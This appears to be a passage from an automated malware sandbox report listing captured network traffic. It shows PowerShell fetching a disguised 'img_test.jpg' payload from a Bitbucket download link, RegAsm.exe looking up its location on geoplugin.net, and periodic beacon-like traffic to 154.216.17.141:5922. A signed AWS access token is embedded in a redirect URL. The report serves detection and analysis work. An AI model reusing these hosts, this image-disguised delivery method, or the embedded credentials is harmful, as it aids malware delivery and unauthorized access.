                                                                                            Oct 21, 2024 17:05:24.493490934 CEST498055922192.168.2.6154.216.17.141
                                                                                            Oct 21, 2024 17:05:24.498827934 CEST592249805154.216.17.141192.168.2.6
                                                                                            Oct 21, 2024 17:05:24.694657087 CEST592249805154.216.17.141192.168.2.6
                                                                                            Oct 21, 2024 17:05:24.743441105 CEST498055922192.168.2.6154.216.17.141
                                                                                            Oct 21, 2024 17:05:24.800620079 CEST592249805154.216.17.141192.168.2.6
                                                                                            Oct 21, 2024 17:05:24.849761009 CEST498055922192.168.2.6154.216.17.141
                                                                                            Oct 21, 2024 17:05:24.858247042 CEST498055922192.168.2.6154.216.17.141
                                                                                            Oct 21, 2024 17:05:24.866900921 CEST592249805154.216.17.141192.168.2.6
                                                                                            Oct 21, 2024 17:05:24.958507061 CEST4981280192.168.2.6178.237.33.50
                                                                                            Oct 21, 2024 17:05:24.964570045 CEST8049812178.237.33.50192.168.2.6
                                                                                            Oct 21, 2024 17:05:24.964653015 CEST4981280192.168.2.6178.237.33.50
                                                                                            Oct 21, 2024 17:05:24.965724945 CEST4981280192.168.2.6178.237.33.50
                                                                                            Oct 21, 2024 17:05:24.971697092 CEST8049812178.237.33.50192.168.2.6
                                                                                            Oct 21, 2024 17:05:25.552651882 CEST8049812178.237.33.50192.168.2.6
                                                                                            Oct 21, 2024 17:05:25.552751064 CEST4981280192.168.2.6178.237.33.50
                                                                                            Oct 21, 2024 17:05:25.563987970 CEST498055922192.168.2.6154.216.17.141
                                                                                            Oct 21, 2024 17:05:25.569442034 CEST592249805154.216.17.141192.168.2.6
                                                                                            Oct 21, 2024 17:05:26.633928061 CEST8049812178.237.33.50192.168.2.6
                                                                                            Oct 21, 2024 17:05:26.633991003 CEST4981280192.168.2.6178.237.33.50
                                                                                            Oct 21, 2024 17:05:41.587690115 CEST592249805154.216.17.141192.168.2.6
                                                                                            Oct 21, 2024 17:05:41.735948086 CEST498055922192.168.2.6154.216.17.141
                                                                                            Oct 21, 2024 17:05:41.741410971 CEST592249805154.216.17.141192.168.2.6
                                                                                            Oct 21, 2024 17:06:11.594551086 CEST592249805154.216.17.141192.168.2.6
                                                                                            Oct 21, 2024 17:06:11.595941067 CEST498055922192.168.2.6154.216.17.141
                                                                                            Oct 21, 2024 17:06:11.601382971 CEST592249805154.216.17.141192.168.2.6
                                                                                            Oct 21, 2024 17:06:41.610932112 CEST592249805154.216.17.141192.168.2.6
                                                                                            Oct 21, 2024 17:06:41.612391949 CEST498055922192.168.2.6154.216.17.141
                                                                                            Oct 21, 2024 17:06:41.617960930 CEST592249805154.216.17.141192.168.2.6
                                                                                            Oct 21, 2024 17:07:11.608716011 CEST592249805154.216.17.141192.168.2.6
                                                                                            Oct 21, 2024 17:07:11.610266924 CEST498055922192.168.2.6154.216.17.141
                                                                                            Oct 21, 2024 17:07:11.615617990 CEST592249805154.216.17.141192.168.2.6
                                                                                            Oct 21, 2024 17:07:14.915230036 CEST4981280192.168.2.6178.237.33.50
                                                                                            Oct 21, 2024 17:07:15.225039959 CEST4981280192.168.2.6178.237.33.50
                                                                                            Oct 21, 2024 17:07:15.834378958 CEST4981280192.168.2.6178.237.33.50
                                                                                            Oct 21, 2024 17:07:17.037523985 CEST4981280192.168.2.6178.237.33.50
                                                                                            Oct 21, 2024 17:07:19.447257042 CEST4981280192.168.2.6178.237.33.50

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 21, 2024 17:05:15.478352070 CEST5285953192.168.2.61.1.1.1
                                                                                            Oct 21, 2024 17:05:15.486227036 CEST53528591.1.1.1192.168.2.6
                                                                                            Oct 21, 2024 17:05:16.522131920 CEST5100653192.168.2.61.1.1.1
                                                                                            Oct 21, 2024 17:05:16.541230917 CEST53510061.1.1.1192.168.2.6
                                                                                            Oct 21, 2024 17:05:21.821723938 CEST6043653192.168.2.61.1.1.1
                                                                                            Oct 21, 2024 17:05:21.828881979 CEST53604361.1.1.1192.168.2.6
                                                                                            Oct 21, 2024 17:05:24.937035084 CEST5285253192.168.2.61.1.1.1
                                                                                            Oct 21, 2024 17:05:24.945240021 CEST53528521.1.1.1192.168.2.6
                                                                                            Oct 21, 2024 17:05:34.828758955 CEST53543701.1.1.1192.168.2.6

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Oct 21, 2024 17:05:15.478352070 CEST192.168.2.61.1.1.10xc0b8Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:16.522131920 CEST192.168.2.61.1.1.10xe91fStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:21.821723938 CEST192.168.2.61.1.1.10x4bd2Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:24.937035084 CEST192.168.2.61.1.1.10xd8c1Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Oct 21, 2024 17:05:15.486227036 CEST1.1.1.1192.168.2.60xc0b8No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:15.486227036 CEST1.1.1.1192.168.2.60xc0b8No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:15.486227036 CEST1.1.1.1192.168.2.60xc0b8No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:16.541230917 CEST1.1.1.1192.168.2.60xe91fNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:16.541230917 CEST1.1.1.1192.168.2.60xe91fNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:16.541230917 CEST1.1.1.1192.168.2.60xe91fNo error (0)s3-w.us-east-1.amazonaws.com52.217.161.161A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:16.541230917 CEST1.1.1.1192.168.2.60xe91fNo error (0)s3-w.us-east-1.amazonaws.com52.217.36.188A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:16.541230917 CEST1.1.1.1192.168.2.60xe91fNo error (0)s3-w.us-east-1.amazonaws.com54.231.164.161A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:16.541230917 CEST1.1.1.1192.168.2.60xe91fNo error (0)s3-w.us-east-1.amazonaws.com16.15.184.63A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:16.541230917 CEST1.1.1.1192.168.2.60xe91fNo error (0)s3-w.us-east-1.amazonaws.com3.5.23.236A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:16.541230917 CEST1.1.1.1192.168.2.60xe91fNo error (0)s3-w.us-east-1.amazonaws.com52.217.168.193A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:16.541230917 CEST1.1.1.1192.168.2.60xe91fNo error (0)s3-w.us-east-1.amazonaws.com52.217.191.17A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:16.541230917 CEST1.1.1.1192.168.2.60xe91fNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.191A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:21.828881979 CEST1.1.1.1192.168.2.60x4bd2No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:21.828881979 CEST1.1.1.1192.168.2.60x4bd2No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:21.828881979 CEST1.1.1.1192.168.2.60x4bd2No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:21.828881979 CEST1.1.1.1192.168.2.60x4bd2No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:24.945240021 CEST1.1.1.1192.168.2.60xd8c1No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:33.423366070 CEST1.1.1.1192.168.2.60xe1fcNo error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:33.423366070 CEST1.1.1.1192.168.2.60xe1fcNo error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:05:33.423366070 CEST1.1.1.1192.168.2.60xe1fcNo error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:06:05.676620007 CEST1.1.1.1192.168.2.60xa857No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                            Oct 21, 2024 17:06:05.676620007 CEST1.1.1.1192.168.2.60xa857No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • bitbucket.org
                                                                                            • bbuseruploads.s3.amazonaws.com
                                                                                            • raw.githubusercontent.com
                                                                                            • geoplugin.net

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.649812178.237.33.50807436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 21, 2024 17:05:24.965724945 CEST71OUTGET /json.gp HTTP/1.1
                                                                                            Host: geoplugin.net
                                                                                            Cache-Control: no-cache
                                                                                            Oct 21, 2024 17:05:25.552651882 CEST1168INHTTP/1.1 200 OK
                                                                                            date: Mon, 21 Oct 2024 15:05:25 GMT
                                                                                            server: Apache
                                                                                            content-length: 960
                                                                                            content-type: application/json; charset=utf-8
                                                                                            cache-control: public, max-age=300
                                                                                            access-control-allow-origin: *
                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 32 31 36 2e 35 32 2e 31 38 33 2e 31 35 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                                                            Data Ascii: { "geoplugin_request":"216.52.183.150", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7157", "geoplugin_longitude":"-74", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.649758185.166.143.484431812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-21 15:05:16 UTC110OUTGET /adssgfdsg/testing/downloads/img_test.jpg?144417 HTTP/1.1
                                                                                            Host: bitbucket.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-21 15:05:16 UTC5162INHTTP/1.1 302 Found
                                                                                            Date: Mon, 21 Oct 2024 15:05:16 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Content-Length: 0
                                                                                            Server: AtlassianEdge
                                                                                            Location: https://bbuseruploads.s3.amazonaws.com/cbff8810-ace3-4466-81b1-12ba7827c90a/downloads/6b181c48-ea9d-4bf0-91bd-66321b83871e/img_test.jpg?response-content-disposition=attachment%3B%20filename%3D%22img_test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNO4DHE4VD&Signature=T6wewlQZbJQSKGkGpdqwpwnElD0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECcaCXVzLWVhc3QtMSJHMEUCIHdpGFp%2BMWJdC40IhWJ3SSuh%2F3P9BfkWVJgGy%2F5d%2FxJrAiEA7cnRTAkYqS7IEoVvpfPhmiGIFqnW%2BTusWS1k%2B1LqRikqsAIIkP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJ3hZc5H13DpsrVvSiqEAljj%2Feh582Kf2l0rpXwuMkBTuVn5fmjxN%2F1UiGutq1P4eK6JpawNdKFwSb8l%2FBnJ7U5ngONu60OLxfc6clZbFgjDwM4%2Binq%2BtGirnaPvueTnkbFKwYcig0YN%2BXANfigCXdSciOrBg%2BF8ITeQUmtEngmT7cfpw%2FcS7o0Ca21R7rEL4sAFd%2FQGP4LHIKW4I8PHOJS7KDTwFSdbyJh0ZlsbBUKsG6nqervFT%2BkQqDFEvcCT3UE%2Bgf5YOa2Imez9jOuySSc0y0JrDCQxV0VL5777zwENSg149ioqUwRzrSQZ5r4uHdbGlyudfflZEMvBEQk5PSM9xVer2lqAPOQ8TCemuoAB0naRMM%2Fa2bgGOp0BRtpiv1UEzqz9j23bqShE4p37bMiYIPCEIVvttSlSIWNWclxJdsdz%2FKRhdxCMY6AmnPnHOIwyQPueK%2BLYy%2FV5HlKlvGL [TRUNCATED]
                                                                                            Expires: Mon, 21 Oct 2024 15:05:16 GMT
                                                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                            X-Used-Mesh: False
                                                                                            Vary: Accept-Language, Origin
                                                                                            Content-Language: en
                                                                                            X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                            X-Dc-Location: Micros-3
                                                                                            X-Served-By: 88505e7b3e88
                                                                                            X-Version: b021f2266265
                                                                                            X-Static-Version: b021f2266265
                                                                                            X-Request-Count: 3894
                                                                                            X-Render-Time: 0.049344778060913086
                                                                                            X-B3-Traceid: ca5afaae37dc4bb7b40e674d637e8f69
                                                                                            X-B3-Spanid: e266b4c412124405
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Content-Security-Policy: object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.p [TRUNCATED]
                                                                                            X-Usage-Quota-Remaining: 999168.756
                                                                                            X-Usage-Request-Cost: 848.70
                                                                                            X-Usage-User-Time: 0.023399
                                                                                            X-Usage-System-Time: 0.002062
                                                                                            X-Usage-Input-Ops: 0
                                                                                            X-Usage-Output-Ops: 0
                                                                                            Age: 0
                                                                                            X-Cache: MISS
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-Xss-Protection: 1; mode=block
                                                                                            Atl-Traceid: ca5afaae37dc4bb7b40e674d637e8f69
                                                                                            Atl-Request-Id: ca5afaae-37dc-4bb7-b40e-674d637e8f69
                                                                                            Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                            Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                            Server-Timing: atl-edge;dur=169,atl-edge-internal;dur=2,atl-edge-upstream;dur=168,atl-edge-pop;desc="aws-eu-central-1"
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.64976452.217.161.1614431812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-21 15:05:17 UTC1201OUTGET /cbff8810-ace3-4466-81b1-12ba7827c90a/downloads/6b181c48-ea9d-4bf0-91bd-66321b83871e/img_test.jpg?response-content-disposition=attachment%3B%20filename%3D%22img_test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNO4DHE4VD&Signature=T6wewlQZbJQSKGkGpdqwpwnElD0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECcaCXVzLWVhc3QtMSJHMEUCIHdpGFp%2BMWJdC40IhWJ3SSuh%2F3P9BfkWVJgGy%2F5d%2FxJrAiEA7cnRTAkYqS7IEoVvpfPhmiGIFqnW%2BTusWS1k%2B1LqRikqsAIIkP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJ3hZc5H13DpsrVvSiqEAljj%2Feh582Kf2l0rpXwuMkBTuVn5fmjxN%2F1UiGutq1P4eK6JpawNdKFwSb8l%2FBnJ7U5ngONu60OLxfc6clZbFgjDwM4%2Binq%2BtGirnaPvueTnkbFKwYcig0YN%2BXANfigCXdSciOrBg%2BF8ITeQUmtEngmT7cfpw%2FcS7o0Ca21R7rEL4sAFd%2FQGP4LHIKW4I8PHOJS7KDTwFSdbyJh0ZlsbBUKsG6nqervFT%2BkQqDFEvcCT3UE%2Bgf5YOa2Imez9jOuySSc0y0JrDCQxV0VL5777zwENSg149ioqUwRzrSQZ5r4uHdbGlyudfflZEMvBEQk5PSM9xVer2lqAPOQ8TCemuoAB0naRMM%2Fa2bgGOp0BRtpiv1UEzqz9j23bqShE4p37bMiYIPCEIVvttSlSIWNWclxJdsdz%2FKRhdxCMY6AmnPnHOIwyQPueK%2BLYy%2FV5HlKlvGL7cX5kPi6DbUpaR6DWxL6p2AoqNVyGjtCQwiwBbff1ljX [TRUNCATED]
                                                                                            Host: bbuseruploads.s3.amazonaws.com
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-21 15:05:17 UTC528INHTTP/1.1 200 OK
                                                                                            x-amz-id-2: e2Bzni8MLKlLXHUZbLuhB7fDFdaC4kaLH8LEcu6qzV1oN/PqPnNV2JfowYwEoND9Qjjxpol0x90=
                                                                                            x-amz-request-id: YCJBKQ12YH5YNCRS
                                                                                            Date: Mon, 21 Oct 2024 15:05:18 GMT
                                                                                            Last-Modified: Fri, 11 Oct 2024 19:32:10 GMT
                                                                                            ETag: "e0d39b0a0496243d533fe927251c3b32"
                                                                                            x-amz-server-side-encryption: AES256
                                                                                            x-amz-version-id: RXNouSsAldf7yiXikeGhYPApJ6wa7Pf9
                                                                                            Content-Disposition: attachment; filename="img_test.jpg"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Type: image/jpeg
                                                                                            Content-Length: 2578503
                                                                                            Server: AmazonS3
                                                                                            Connection: close
                                                                                            2024-10-21 15:05:17 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 00 16 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 00 00 00 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 00 09 0a ff c4 00 5f 10 00 01 03 03 03 02 04 03 06 04 03 06 03 01 01 21 01
                                                                                            Data Ascii: JFIF,,ExifMM*CCp"_!
                                                                                            2024-10-21 15:05:17 UTC496INData Raw: c1 dc 0f e7 54 ac a7 04 aa 69 93 0d 3f c8 ef 4f ad ee 14 a4 41 54 fa 54 33 17 52 07 30 45 3a b7 b8 d8 48 93 3d e7 bd 54 9d 4c 96 32 c1 32 97 0a 76 9d c2 97 69 ed c9 24 1e 47 1f 5a 8a 45 cc ab 69 3e c0 f6 a5 db 7f 6f f5 4a 63 f5 a8 1c 19 2a 91 2a 9b 84 84 8f 9b 9e f1 e9 47 45 c4 a8 ca b8 f5 a8 d4 3a 95 81 07 bf 95 28 9b 9e 7e 6f c3 40 eb 13 91 22 ab 94 88 04 f6 ff 00 bf ca 8c 1f 49 50 83 51 ad dc c4 a8 11 1e 46 79 a3 0b a3 f8 89 24 9f 2a 1f 6d 8f bb 82 47 c4 e1 26 7b 8a 37 8d b8 f0 79 a8 c1 7c 79 98 03 b0 a1 6e f7 c3 59 25 44 f1 e9 4d ed 0d b8 93 37 02 48 04 11 41 f7 84 ef 1c 0a 8c 5d ee d3 09 30 26 8a e6 43 6f 3d 88 f4 34 5e d0 9c 91 2a 6e 40 02 48 04 fb d1 d1 76 15 b7 d3 91 de a1 55 7e 48 9f 33 e6 0f 7a f3 79 12 99 12 62 9d c1 f6 1f 71 3b f7 89 4f 04 49
                                                                                            Data Ascii: Ti?OATT3R0E:H=TL22vi$GZEi>oJc**GE:(~o@"IPQFy$*mG&{7y|ynY%DM7HA]0&Co=4^*n@HvU~H3zybq;OI
                                                                                            2024-10-21 15:05:17 UTC16384INData Raw: 62 9d c2 67 91 3c 91 48 bc b0 15 f5 fc aa 68 f0 46 df 23 47 6d c1 31 1c 79 d3 77 6c c9 04 84 82 07 d6 9f 92 9f 69 34 57 1a 1c 1e 01 fe d5 34 5f 60 64 88 87 ed 3b c2 7b 53 0b ab 58 07 ca ac 0f 32 95 4f 6f 7e 62 a3 af 18 ef 1d fd cf 15 3d 72 e4 0f c3 20 6f 2d c2 d3 30 62 66 98 3a c0 4a 3b 76 f3 f7 a9 cb 9b 70 12 79 f3 a8 db 96 37 c8 e2 27 b5 68 d6 f2 56 9a c3 21 5e 4e c6 cc ff 00 51 e6 7c aa 36 f8 8d 84 81 ed 53 97 4c 77 33 26 a1 af 5b 25 11 3c 79 d6 85 65 79 a2 1e e9 3b 90 4c 8e de 74 d2 e1 29 09 3c 77 f3 fd 69 e5 c3 65 b4 a8 a8 92 0f 26 91 79 92 e0 90 a8 06 af d7 d8 89 ac 11 8f 28 6c 51 1b b9 ee 29 a1 b4 5f f5 02 41 e4 54 bb 76 61 42 09 04 7f 7a 7b 69 8f 48 db 25 20 0a b2 9a 5d c8 99 59 76 c9 40 13 b1 62 3d e8 19 68 02 ad a7 f0 c8 3c d5 9b 28 c2 0b 0a 03
                                                                                            Data Ascii: bg<HhF#Gm1ywli4W4_`d;{SX2Oo~b=r o-0bf:J;vpy7'hV!^NQ|6SLw3&[%<yey;Lt)<wie&y(lQ)_ATvaBz{iH% ]Yv@b=h<(
                                                                                            2024-10-21 15:05:17 UTC1024INData Raw: cf a9 af 25 2a 1c 73 e9 20 ff 00 d2 9d 86 a4 91 46 16 fc 79 50 3c 04 33 29 f9 80 32 00 33 34 74 b6 12 15 c8 3e a6 97 36 d0 9f 2e 28 a1 9d 9c 71 42 20 a1 21 40 1f 2e f1 47 09 dc 98 8f 61 22 8c db 70 9e e3 f5 8a 10 92 7e b3 eb 4c e4 23 c1 30 9e 4f 68 a1 29 e4 0e 6b ca 44 01 04 98 a3 26 4a 79 a0 11 e6 e4 0f 5e 69 44 a8 1f 59 a4 c0 09 24 09 e0 d1 d1 04 91 ef 48 40 4f 3c 73 f9 d2 89 51 db c1 ef de 8a e2 60 48 e2 2b c8 04 45 36 07 4f 02 ed ae 55 f4 e6 96 49 f9 92 20 c0 a6 c9 ee 79 13 f5 a5 10 a3 b8 73 42 d0 6b 91 cb 44 19 20 cf bd 2c 14 09 13 de 78 e7 b5 20 98 da 63 ca 95 6d 13 c1 34 c2 16 6f 95 8f 58 a3 b7 09 4a 7b f2 7c a8 8d 88 5f d3 8a 3b 49 07 d3 83 eb ff 00 4a 42 14 09 2a 00 cc 7b 45 18 af 68 f3 a4 d2 bd a4 09 11 5e 52 e5 5e dd fd 28 5c 44 2a 85 ef 3d 88
                                                                                            Data Ascii: %*s FyP<3)234t>6.(qB !@.Ga"p~L#0Oh)kD&Jy^iDY$H@O<sQ`H+E6OUI ysBkD ,x cm4oXJ{|_;IJB*{Eh^R^(\D*=
                                                                                            2024-10-21 15:05:17 UTC16384INData Raw: b6 09 20 81 13 f9 52 0e b0 09 91 c0 a7 ea 40 e0 1e 23 ce 93 53 21 52 0f 34 59 02 44 50 b6 f9 a3 9e 0f e5 47 4d b8 24 48 e7 eb 4f 4b 07 71 ec 09 a0 28 90 20 4c 7b c4 d2 18 6b f7 30 ea 78 04 79 51 c5 80 6c 73 27 8a 72 94 14 f3 db f3 99 af 05 85 a6 7c c0 ed 48 44 65 c5 a2 67 b1 3c 52 05 a2 83 d8 c5 48 3e 9d c4 f2 3b 7d 29 ba d3 00 82 49 fc e9 09 8d 95 00 f6 23 ea 6b ce a4 28 77 99 a3 a9 1f 5f d6 88 78 49 11 e7 fa d2 10 dd 7d a7 cf 9a 41 d4 8f 08 fe bf 4a 70 a4 f1 c0 e4 52 2f 0f 95 5f 48 a3 4c 44 7b e8 96 cf 62 7b 71 48 3e 37 03 e5 da 9d 5d 00 11 de 27 bd 36 70 05 13 e8 2a c2 ec 21 15 00 b0 79 f5 a3 25 24 c4 71 c7 f9 50 38 02 07 1c c5 1a 78 91 1c d3 88 49 48 94 19 e0 2a 8a b4 0d c0 73 26 97 58 84 10 3c bf 3a 05 34 41 99 14 e9 89 8c d6 d0 12 76 9e 45 20 a4 6d
                                                                                            Data Ascii: R@#S!R4YDPGM$HOKq( L{k0xyQls'r|HDeg<RH>;})I#k(w_xI}AJpR/_HLD{b{qH>7]'6p*!y%$qP8xIH*s&X<:4AvE m
                                                                                            2024-10-21 15:05:17 UTC1024INData Raw: c0 e3 d6 9a be df 87 e9 1e 67 9a 74 c2 c0 c9 4d 27 72 8c f3 eb 49 a9 20 7f 6e 29 67 cf cc 7b 08 30 39 34 94 05 28 84 88 54 f7 a2 dc 84 14 27 77 ca 38 fe f4 bb 2d 6f fe f3 45 4a 42 e4 47 24 fe b4 f6 c5 a4 a0 6d ed fe 74 2d e4 1d a2 6c d9 95 98 3d 89 f5 a1 72 d4 a5 45 21 40 0a 7a c3 61 30 69 2b 84 ca 8f 7e 3b 53 0b 03 07 59 e0 95 1e df 9f e7 4c 2e 5b 95 14 ce e9 f5 e2 2a 51 fe 53 00 03 03 cf 8a 65 70 80 b5 02 40 e6 8d 76 04 8d 75 90 90 00 3b 8f e9 34 91 62 42 8e e5 03 e8 3b 53 97 92 01 ec 24 73 de 91 dc 12 a2 3b 95 54 91 62 08 86 7e 43 bb e6 f3 e0 40 14 a1 b4 1b 01 2a 30 28 02 c0 73 68 51 88 8a 5c 10 a4 94 c8 26 3c fc a9 c4 34 bb 6c 6e e0 98 02 22 78 9a 6c 10 01 e6 7d 27 d7 de a4 6e 59 33 dc 76 9a 6e 94 10 8d d1 cc 13 f5 a4 21 1f 08 6d 24 93 41 e6 66 79 32
